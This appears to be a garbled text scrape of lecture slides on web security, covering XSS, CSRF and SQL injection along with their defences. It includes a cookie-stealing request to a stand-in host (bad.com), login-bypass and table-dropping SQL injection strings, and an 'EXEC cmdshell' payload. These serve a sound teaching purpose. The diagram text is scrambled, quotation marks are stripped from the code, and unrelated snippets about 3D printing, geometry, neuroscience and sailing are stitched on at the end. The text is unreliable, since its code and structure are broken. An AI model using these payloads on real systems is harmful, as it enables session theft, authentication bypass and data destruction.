to Java Powerful web page programming language Scripts embedded in pages returned by the web server Scripts are executed by the browser. They can: Alter page contents (DOM objects) Track events (mouse clicks, motion, keystrokes)
Layout, cookies, events with their origin Hostname (bank.com) that provided them SOP = only scripts received from a web pages origin have access to the pages elements Cross-site scripting (XSS) Two types of XSS 1. Stored (or persistent) XSS attack Attacker leaves script on the bank.com server Server later unwittingly sends it to your browser
Browser executes it within same origin as bank.com Stored XSS attack GET http://bad.com/steal?c=document.cookie Client Browser 4 Execute the malicious script as though the server meant us to run it ata d e bl a
u l va l a e 5St 2 Re 3Re 5Pe 1 qu e cei v rfo bad.com
st c em ont ent Inject malicious script alic iou rm s sc att ript ack er a ctio n
Users who visited his page ran the program, which Made them friends with Samy Displayed but most of all, Samy is my hero on profile Installed script in their profile to propagate From 73 to 1,000,000 friends in 20 hours Took down MySpace for a weekend Felony computer hacking; banned from computers for 3 years Two types of XSS 1. Stored (or persistent) XSS attack
Your browser executes the script in the response within the same origin as bank.com Reflected XSS attack Client Browser 5 Execute the malicious script as though the server meant us to run it ite s ge b a e p
w it ous i c i 1 Vis l a m e ta eiv a c d e le 2R b a u val
l a 6Ste 3C lick on 4 E lin k cho use 6Pe r in rfo put rm a tta c ker
a bad.com URL specially crafted by the attacker ctio n bank.com Echoed input The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response Input from bad.com: http://victim.com/search.php?term=socks Result from victim.com:
Results for socks: . . . Exploiting echoed input Input from bad.com: http://victim.com/search.php?term= Result from victim.com: Search results Results for . . . Browser would execute this within victim.coms origin
Key trick: Server does not ensure its output does not contain foreign, embedded scripts XSS Defense: Filter/Escape Typical defense is sanitizing: remove executable portions of user-provided content or ... Libraries exist for this purpose Better defense: White list
Instead of trying to sanitize, validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous spec of what should be allowed.
XSS vs. CSRF Do not confuse the two: XSS exploits the trust a client browser has in data sent from the legitimate website So the attacker tries to control what the website sends to the client browser CSRF exploits the trust a legitimate website has in data sent from the client browser So the attacker tries to control what the client browser sends to the website
SQL injection http://xkcd.com/327/ Server-side data Client Server Browser Web server (Private) Data Databas e Long-lived state, stored in a separate database Need to protect this state
from illicit access and tampering SQL (Standard Query Language) Table Users Table name Name Gender Age Email Password Connie F
SELECT Age FROM Users WHERE Name=Greg; 34 UPDATE Users SET [email protected] WHERE Age=34; -- this is a comment INSERT INTO Users Values(Pearl, F, ...); DROP TABLE Users; Row (Record) Server-side code Website Login code (PHP) $result = mysql_query(select * from Users where(name=$user and password=$pass);); Suppose you successfully log in as $user if this returns any results How could you exploit this?
SQL injection frank OR 1=1); -$result = mysql_query(select * from Users where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=frank OR 1=1); -and password=whocares);); Login successful! Problem: Data and code mixed up together SQL injection: Worse frank OR 1=1); DROP TABLE Users; -$result = mysql_query(select * from Users where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=frank OR 1=1); DROP TABLE Users; -and password=whocares);); Can chain together statements with semicolon: STATEMENT 1 ; STATEMENT 2 SQL injection: Even worse ; EXEC cmdshell ; -$result = mysql_query(select * from Users
where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=); EXEC cmdshell ; -and password=whocares);); http://xkcd.com/327/ SQL injection attacks are common 25 % 20 of vulnerabilities that are SQL injection 15 10 5 0 http://web.nvd.nist.gov/view/vuln/statistics SQL injection countermeasures
The underlying issue $result = mysql_query(select * from Users where(name=$user and password=$pass);); This one string combines the code and the data Similar to buffer overflows When the boundary between code and data blurs, we open ourselves up to vulnerabilities The underlying issue $result = mysql_query(select * from Users where(name=$user and password=$pass);); select / from / where *
Users and = name Should be data, not code = $user $user password $pass Prevention: Input validation
We require input of a certain form, but we cannot guarantee it has that form, so we must validate it Just like we do to avoid buffer overflows Making input trustworthy Check it has the expected form, reject it if not Sanitize by modifying it or using it such that the result is correctly formed Sanitization: Blacklisting
; - Delete the characters you dont want Downside: Lupita Nyongo You want these characters sometimes! How do you know if/when the characters are
bad? Downside: How to know youve IDd all bad chars? Sanitization: Escaping Replace problematic characters with safe ones Change to \ Change ; to \;
Change - to \- Change \ to \\ Hard by hand, there are many libs & methods magic_quotes_gpc = On mysql_real_escape_string() Downside: Sometimes you want these in your SQL! And escaping still may not be enough
Checking: Whitelisting Check that the user input is known to be safe E.g., integer within the right range Rationale: Given invalid input, safer to reject than fix Fixes may result in wrong output, or vulnerabilities Principle of fail-safe defaults
Downside: Hard for rich input! How to whitelist usernames? First names? Sanitization via escaping, whitelisting, blacklisting is HARD. Can we do better? Sanitization: Prepared statements Treat user data according to its type Decouple the code and the data $result = mysql_query("select * from Users where(name=$user and password=$pass);"); $db = new mysql("localhost", "user", "pass", "DB"); $statement = $db->prepare("select * from Users
where(name=? and password=?);"); Bind variables $statement->bind_param("ss", $user, $pass); $statement->execute(); Bind variables are typed Using prepared statements $statement = $db->prepare("select * from Users $statement = * from Users where(name=? andselect password=?);"); where(name=$user and password=$pass);; $stmt->bind_param("ss", $user, $pass);
select / from / where * Users and = name = frank ? $user OR 1=1); -- password $pass ? Binding is only applied to the leaves,
so the structure of the tree is fixed Additional For defense in depth, alsomitigation try to mitigate any attack But should always do input validation in any case! Limit privileges; reduces power of exploitation Limit commands and/or tables a user can access
e.g., allow SELECT on Orders but not Creditcards Encrypt sensitive data; less useful if stolen May not need to encrypt Orders table But certainly encrypt creditcards.cc_numbers Input validation, ad infinitum Many other webbased bugs, ultimately due to trusting external input (too much)
http://www.jantoo.com/cartoon/08336711 Takeaways: Verify before trust Improperly validated input causes many attacks Common to solutions: check or sanitize all data Whitelisting: More secure than blacklisting Checking: More secure than sanitization
Proper sanitization is hard All data: Are you sure you found all inputs? Dont roll your own: libraries, frameworks, etc.
We also have high-end printing on campus. Objet 260 Printer. Multi-material. Hard and flexible in one print. Multiple colors. High accuracy <1 mm resolution. Large volume. 250x250x250 mm. Airway model with stiff bones and soft tissue. Rigid, clear heart model....
Area of Triangles Return to table of contents Area of a Triangle Let's use the same process as we did for the rectangle & parallelogram. How many 1 ft2 tiles fit across the bottom of the triangle? Area of a...
Cells contained in the occipital cortex. Includes… Simple cells (edge detectors) - respond to lines or edges . Complex cells - respond to the motion and color of objects . Hypercomplex cells - respond to an object's orientation, movement, shape,...
The overall rubrics containing instructions to students may continue to be in English, as at present. Questions for the majority of modern foreign languages may be set in the assessed language or English, as appropriate to the task. They should...
Safety Warning. Note that several parts are heavy (21 kg) and sharp.pay attention during unloading, assembling and packing . Elements Placed upright prior to being joined can fall on their side and create a hazard
John F. Wison, 'Heavy Weather Guide' The Voyageur's Handbook - Beth Leonard The International Marine Book of Sailing - Robby Robinson Heavy Weather Sailing - K. Adlard Coles Videos - You Tube * Reality is that, with a little luck,...
Ready to download the document? Go ahead and hit continue!